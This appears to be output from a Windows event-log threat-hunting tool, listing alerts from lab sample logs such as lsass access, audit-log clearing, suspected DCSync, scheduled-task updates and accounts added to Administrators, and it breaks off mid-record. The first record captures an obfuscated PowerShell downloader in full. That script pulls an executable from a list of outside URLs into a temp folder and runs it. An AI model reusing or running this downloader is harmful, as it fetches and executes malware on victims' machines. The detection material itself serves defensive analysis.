DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=21 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + 
ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item" +ParameterBinding(New-Item): name="ItemType"; value="DIrectOry" +ParameterBinding(New-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +non-system accounts getting a handle to and accessing 
lsass,1583705494.340693,2020-03-09T02:11:34.340693+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4663," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +",MSEDGEWIN10,Security +non-system accounts getting a handle to and accessing lsass,1583705494.340584,2020-03-09T02:11:34.340584+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4656," + + + + + 4656 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314461 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + 00000000-0000-0000-0000-000000000000 + %%1537 + %%1538 + %%1539 + %%1540 + %%1541 + %%4480 + %%4481 + %%4482 + %%4483 + %%4484 + %%4485 + %%4486 + %%4487 + %%4488 + %%4489 + %%4490 + %%4491 + %%4492 + %%4493 + + - + 0x1f3fff + - + 0 + 0x1688 + C:\Windows\System32\cscript.exe + - + +",MSEDGEWIN10,Security +Audit log cleared,1556393475.355063,2019-04-27T23:31:15.355063+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 4987 + + + + + Security + IEWIN7 + + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + + +",IEWIN7,Security +Audit log cleared,1600198172.174941,2020-09-15T23:29:32.174941+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 
0 + 0x4020000000000000 + + + 768617 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x4c331 + + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1557281451.611176,2019-05-08T06:10:51.611176+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 202793 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x40c6511 + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1557281451.580169,2019-05-08T06:10:51.580169+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 202792 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x40c6511 + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Audit log cleared,1600340264.254575,2020-09-17T14:57:44.254575+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 769792 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x4c331 + + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1557281443.487217,2019-05-08T06:10:43.487217+04:00,,Threat,High,User Name ( Administrator ) is suspected 
doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 202791 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x40c6511 + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Audit log cleared,1595449776.414827,2020-07-23T00:29:36.414827+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 887106 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x3a17a + + +",01566s-win16-ir.threebeesco.com,Security +Process running in Unusual location,1638898381.636384,2021-12-07T21:33:01.636384+04:00,,Threat,High,"User Name : ( MSEDGEWIN10$ ) with process : ( \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +",MSEDGEWIN10,Security +schedule task updated,1553518420.276615,2019-03-25T16:53:40.276615+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198239223 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" 
encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + <Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T12:51:45Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions 
Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +Audit log cleared,1645007839.637236,2022-02-16T14:37:19.637236+04:00,,Audit,Critical,Audit log cleared by user ( jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 2988521 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1105 + jbrown + 3B + 0x1717b6 + + +",01566s-win16-ir.threebeesco.com,Security +User Created through management interface,1600248733.647851,2020-09-16T13:32:13.647851+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720," + + + + + 4720 + 0 + 0 + 13824 + 0 + 0x8020000000000000 + + + 769634 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + $ + 3B + S-1-5-21-308926384-506822093-3341789130-107104 + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + - + $ + %%1793 + - + %%1793 + %%1793 + %%1793 + %%1793 + %%1793 + %%1794 + %%1794 + 513 + - + 0x0 + 0x15 + + %%2080 + %%2082 + %%2084 + %%1792 + - + %%1793 + +",01566s-win16-ir.threebeesco.com,Security +User Created through management interface,1600248679.134161,2020-09-16T13:31:19.134161+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720," + + + + + 4720 + 0 + 0 + 13824 + 0 + 0x8020000000000000 + + + 769629 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + $ + 3B + S-1-5-21-308926384-506822093-3341789130-107103 + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + - + $ + %%1793 + - + %%1793 + %%1793 + %%1793 + %%1793 + %%1793 + %%1794 + %%1794 + 513 + - + 0x0 + 0x15 + + %%2080 + %%2082 + %%2084 + %%1792 + - + %%1793 + +",01566s-win16-ir.threebeesco.com,Security +schedule task updated,1553516620.16764,2019-03-25T16:23:40.167640+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198238969 + + + 
+ + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + <Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T12:21:45Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + 
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +schedule task updated,1553514820.047682,2019-03-25T15:53:40.047682+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198238774 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + <Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T11:51:45Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + 
<AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +schedule task updated,1553513019.936605,2019-03-25T15:23:39.936605+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198238563 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + 
<Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T11:21:44Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +Audit log cleared,1600879816.697344,2020-09-23T20:50:16.697344+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 772605 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x7b186 + + +",01566s-win16-ir.threebeesco.com,Security +User added to local 
group,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-20 ) to local group ( Administrators ),4732," + + + + + 4732 + 0 + 0 + 13826 + 0 + 0x8020000000000000 + + + 191030 + + + + + Security + MSEDGEWIN10 + + + + + - + S-1-5-20 + Administrators + Builtin + S-1-5-32-544 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x27a10f + - + +",MSEDGEWIN10,Security +User added to local group,1569151399.251925,2019-09-22T15:23:19.251925+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-21-3461203602-4096304019-2269080069-501 ) to local group ( Administrators ),4732," + + + + + 4732 + 0 + 0 + 13826 + 0 + 0x8020000000000000 + + + 191029 + + + + + Security + MSEDGEWIN10 + + + + + - + S-1-5-21-3461203602-4096304019-2269080069-501 + Administrators + Builtin + S-1-5-32-544 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x27a10f + - + +",MSEDGEWIN10,Security +Dcsync Attack detected,1557284437.586173,2019-05-08T07:00:37.586173+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 203056 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x418a6fb + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {9923a32a-3607-11d2-b9be-0000f87a36b2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Audit log cleared,1557284425.304206,2019-05-08T07:00:25.304206+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 203050 + + + + + Security + DC1.insecurebank.local + + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + administrator + insecurebank + 0x218b896 + + +",DC1.insecurebank.local,Security +Dcsync Attack 
detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242594 + + + + + Security + DC1.insecurebank.local + + + + + AF3067E0-BB6F-47C2-AA20-F3F458797F38 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131